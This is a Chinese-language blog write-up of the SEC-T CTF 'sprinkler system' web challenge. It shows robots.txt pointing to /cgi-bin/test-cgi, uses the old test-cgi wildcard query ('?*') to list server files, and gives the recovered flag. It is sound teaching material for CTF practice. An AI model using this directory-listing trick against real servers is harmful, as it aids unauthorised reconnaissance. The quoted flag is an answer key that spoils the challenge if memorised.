首页 > itarticle > [sec-t ctf] – sprinkler system (web 100) 解法

[sec-t ctf] – sprinkler system (web 100) 解法

admin 11月 12, 2020 0

Damn new york… some chick tricked you into standing in the rain on the very first day… it’s payback time!

Service: http://sprinklers.alieni.se/

Author: avlidienbrunn

解法

直接試了 robots.txt 得到:

1
2
 
User-agent: *
Disallow: /cgi-bin/test-cgi

連上 http://sprinklers.alieni.se/cgi-bin/test-cgi 會拿到以下資訊:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
 
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = Apache/2.4.18 (Ubuntu)
SERVER_NAME = sprinklers.alieni.se
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.1
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
PATH_INFO = 
PATH_TRANSLATED = 
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING =
REMOTE_HOST =
REMOTE_ADDR = x.x.x.x
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

查了一下 test-cgi vulnerability ,找到其有 directory listings 的問題(參考:這篇)。在網址 query 加上*可以在QUERY_STRING看到目前資料夾路徑下的所有檔案與資料夾名稱。

http://sprinklers.alieni.se/cgi-bin/test-cgi?*

1
 
QUERY_STRING = enable_sprinkler_system test-cgi

連上 http://sprinklers.alieni.se/cgi-bin/enable_sprinkler_system 即可拿到 flag 。

Flag: SECT{[email protected]_A_l3ak!-}

微海报分享

近期文章

近期评论

标签

热门

文章归档

分类目录

功能